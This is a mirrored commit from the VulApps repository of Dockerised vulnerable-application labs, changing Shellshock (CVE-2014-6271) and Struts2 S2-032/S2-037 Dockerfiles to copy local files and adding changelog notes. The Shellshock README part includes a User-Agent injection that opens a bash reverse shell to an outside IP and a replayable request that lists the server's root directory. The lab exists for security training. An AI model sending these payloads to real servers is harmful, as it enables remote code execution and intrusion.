admin/VulApps
1
0
Fork 0
mirror of https://github.com/Medicean/VulApps.git synced 2025-05-31 18:50:29 +00:00
Code Issues Packages Projects Releases Wiki Activity

修正资源文件路径为绝对路径

Browse Source 
如果使用 URL 方式,下载会非常慢
This commit is contained in:
Medicean 2016-07-30 12:37:53 +08:00
commit 120b5be38f
6 changed files with 30 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
b/bash/shellshock1_CVE-2014-6271/Dockerfile
View File

@ -15,9 +15,10 @@ RUN apt-get -y update \
&& rm -rf /usr/local/src/bash \
&& rm /bin/bash \
&& ln -s /usr/local/bin/bash /bin/bash
COPY poc.cgi /usr/local/apache2/cgi-bin/poc.cgi
RUN cd /usr/local/apache2 \
&& wget -qO /usr/local/apache2/cgi-bin/poc.cgi https://raw.githubusercontent.com/Medicean/VulApps/master/b/bash/shellshock1_CVE-2014-6271/poc.cgi \
&& chmod a+x /usr/local/apache2/cgi-bin/poc.cgi \
&& echo "<a href='/cgi-bin/poc.cgi'>poc.cgi</a>" > /usr/local/apache2/htdocs/index.html \
&& chmod a+x htdocs/index.html \

22
b/bash/shellshock1_CVE-2014-6271/README.md
View File

@ -35,12 +35,18 @@ User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.0.112/8888 0>&1;
完整的请求报文如下(可直接复制到 Burp 下重放)
```
GET /cgi-bin/poc.cgi HTTP/1.1
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: () { :;};echo ; echo; echo; echo $(/bin/ls -al / );
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
GET /cgi-bin/poc.cgi HTTP/1.1
Cache-Control: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: () { :;};echo ; echo; echo; echo $(/bin/ls -al / );
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
```
```
### 改动日志
20160731
* 修正资源为本地路径

5
s/struts2/s2-032/Dockerfile
View File

@ -2,16 +2,13 @@
FROM tomcat:8-jre8
MAINTAINER Medici.Yan@Gmail.com
ENV APP_ZIP_URL https://raw.githubusercontent.com/Medicean/VulApps/master/s/struts2/s2-032/s2-032.war
WORKDIR /tmp
RUN set -ex \
&& rm -rf /usr/local/tomcat/webapps/* \
&& curl -fSL "$APP_ZIP_URL" -o s2-032.war \
&& mv s2-032.war /usr/local/tomcat/webapps/ROOT.war \
&& chmod a+x /usr/local/tomcat/bin/*.sh
COPY s2-032.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080
CMD ["/usr/local/tomcat/bin/catalina.sh", "run"]

5
s/struts2/s2-032/README.md
View File

@ -27,3 +27,8 @@ $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-032
访问 `https://你的 IP 地址:端口号/`
### 改动日志
20160731
* 修正资源为本地路径

5
s/struts2/s2-037/Dockerfile
View File

@ -2,16 +2,13 @@
FROM tomcat:8-jre8
MAINTAINER Medici.Yan@Gmail.com
ENV APP_ZIP_URL https://raw.githubusercontent.com/Medicean/VulApps/master/s/struts2/s2-037/struts2-rest.war
WORKDIR /tmp
RUN set -ex \
&& rm -rf /usr/local/tomcat/webapps/* \
&& curl -fSL "$APP_ZIP_URL" -o struts2-rest.war \
&& mv struts2-rest.war /usr/local/tomcat/webapps/ROOT.war \
&& chmod a+x /usr/local/tomcat/bin/*.sh
COPY struts2-rest.war /usr/local/tomcat/webapps/ROOT.war
EXPOSE 8080
CMD ["/usr/local/tomcat/bin/catalina.sh", "run"]

6
s/struts2/s2-037/README.md
View File

@ -26,3 +26,9 @@ $ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
### 使用与利用
访问 `https://你的 IP 地址:端口号/`
### 改动日志
20160731
* 修正资源为本地路径